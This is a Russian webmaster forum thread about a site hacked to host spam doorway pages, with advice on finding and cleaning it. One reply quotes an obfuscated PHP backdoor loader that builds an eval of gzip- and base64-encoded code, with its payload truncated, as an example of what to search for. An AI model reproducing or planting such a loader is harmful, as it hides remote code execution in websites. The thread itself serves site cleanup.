X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали или глюк с темой?
Reader
Reader
Topic Starter сообщение 16.9.2011, 22:58; Ответить: Reader
Сообщение #1


манимейкер
*******

Группа: Active User
Сообщений: 2509
Регистрация: 22.4.2009
Из: России
Поблагодарили: 1017 раз
Репутация:   121  


Некоторое время назад в дополнительной выдаче гугла появилось много таких страниц: *******

Сам сайт можно посмотреть там же. Взломали? Как лечить, куда смотреть?
Причина редактирования: удалил урл по просьбе ТС
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 16.9.2011, 23:21; Ответить: Rampage
Сообщение #2


Участник
***

Группа: User
Сообщений: 239
Регистрация: 20.11.2010
Из: localhost
Поблагодарили: 67 раз
Репутация:   23  


похоже на то что вам на сайт влепили дор
натыкался на подобное на DLE сайтах когда в папку загрузки изображений заливали доры...

PS лучше пересмотрите файлы сайта и БД

Сообщение отредактировал Rampage - 16.9.2011, 23:22


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Round
Round
сообщение 16.9.2011, 23:30; Ответить: Round
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 484
Регистрация: 19.9.2008
Поблагодарили: 78 раз
Репутация:   18  


Ломанули, возможно тема изначально содержала в себе стучалку, смотрите код


--------------------
Live to win, 'till you die, 'till the light dies in your eyes
Live to win, take it all, just keep fighting till you fall
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Reader
Reader
Topic Starter сообщение 16.9.2011, 23:32; Ответить: Reader
Сообщение #4


манимейкер
*******

Группа: Active User
Сообщений: 2509
Регистрация: 22.4.2009
Из: России
Поблагодарили: 1017 раз
Репутация:   121  


Только на этих страницах почему то нет ссылок, просто по паре предложений текста.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 16.9.2011, 23:35; Ответить: Rampage
Сообщение #5


Участник
***

Группа: User
Сообщений: 239
Регистрация: 20.11.2010
Из: localhost
Поблагодарили: 67 раз
Репутация:   23  


ищите шеллы бекдоры и прочую фигню возможно страница готовится для дальшейшего слива трафа post-2472-1287325497.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Reader
Reader
Topic Starter сообщение 17.9.2011, 0:25; Ответить: Reader
Сообщение #6


манимейкер
*******

Группа: Active User
Сообщений: 2509
Регистрация: 22.4.2009
Из: России
Поблагодарили: 1017 раз
Репутация:   121  


В бд ничего нет, остаются файлы. Нашел много ссылок, осталось найти код.

Теперь еще один вопрос: как сделать 301 редирект со множества страниц вида

/?eec=blabla
/?eec=blablabla

Прописывать каждую ссылку нереально, можно сделать сделать редирект всех ссылок вида /?eec= на главную?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Friend
Friend
сообщение 17.9.2011, 1:51; Ответить: Friend
Сообщение #7


Новичок
*


Группа: User
Сообщений: 29
Регистрация: 4.12.2008
Поблагодарили: 7 раз
Репутация:   0  


Reader, поищите файлы с именами skwd, kwd, lock, а также страницы вида ____any-name. Скорее всего проинклудили файлы вот такой штукой или ей подобной и залили дор, страниц этак на пару тысяч:

<?php
$md5 = "71f4d60cd528c299cdba7d684da9ed0c";
$wp_salt = array('f','_','e',";","6",'o',"r","d",'g','a',"i",'s',"b","l",'$',')','(',"c","n","t","v",'4','z');
$wp_add_filter = create_function('$'.'v',$wp_salt[2].$wp_salt[20].$wp_salt[9].$wp_salt[13].$wp_salt[16].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[18].$wp_salt[0].$wp_salt[13].$wp_salt[9].$wp_salt[19].$wp_salt[2].$wp_salt[16].$wp_salt[12].$wp_salt[9].$wp_salt[11].$wp_salt[2].$wp_salt[4].$wp_salt[21].$wp_salt[1].$wp_salt[7].$wp_salt[2].$wp_salt[17].$wp_salt[5].$wp_salt[7].$wp_salt[2].$wp_salt[16].$wp_salt[14].$wp_salt[20].$wp_salt[15].$wp_salt[15].$wp_salt[15].$wp_salt[3]);
$wp_add_filter('FZdFzsbcsYSXkz/ywEyKMjAzsydXZnjNbK/+ftnAUZ9W9VNV1ZUN/zRfN9VDdlT/5NleEdj/lVUxl9U//+LTUuTPbxZnK4bAYm0QRoSthR3V31dl820QIAA7mfUbQCQld+wCkZoYUWm/wPNJQeh8AozeAOrVMgqwLfun+tz5C1eYnpoWU6N+uomTxztl9mSntiEYfaym1/DEISk1ukJ3ngi0S5mI49Sbr290VQjbYIuH0


Как только найдете пару файлов, которые были изменены, посмотрите на дату их изменения и поищите что ещё менялось в этот день. Ну а далее все почистите и ждите...


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Reader
Reader
Topic Starter сообщение 17.9.2011, 12:31; Ответить: Reader
Сообщение #8


манимейкер
*******

Группа: Active User
Сообщений: 2509
Регистрация: 22.4.2009
Из: России
Поблагодарили: 1017 раз
Репутация:   121  


Friend, найти инклуды так и не смог, удалил все полностью, залил чистый движек, поменял пароли.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) ТИЦ или ТРАСТ ?
13 regem 624 Сегодня, 17:46
автор: regem
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
8 Intersect 366 Сегодня, 16:13
автор: Infacto
Горячая тема (нет новых ответов) Что лучше, фриланс, удаленка, или работа в офисе солидной компании?
97 Levizar 7959 Сегодня, 13:51
автор: Smspva
Открытая тема (нет новых ответов) Домен .рф или .ru?
Есть ли сейчас разница для поисковых систем?
11 SuperPill 1538 11.12.2017, 18:14
автор: RICHHost
Горячая тема (нет новых ответов) Главная страница сайта.Больше текста или фото?
98 PROK777 16615 11.12.2017, 15:57
автор: vsemmoney


 



RSS Текстовая версия Сейчас: 15.12.2017, 17:58
Дизайн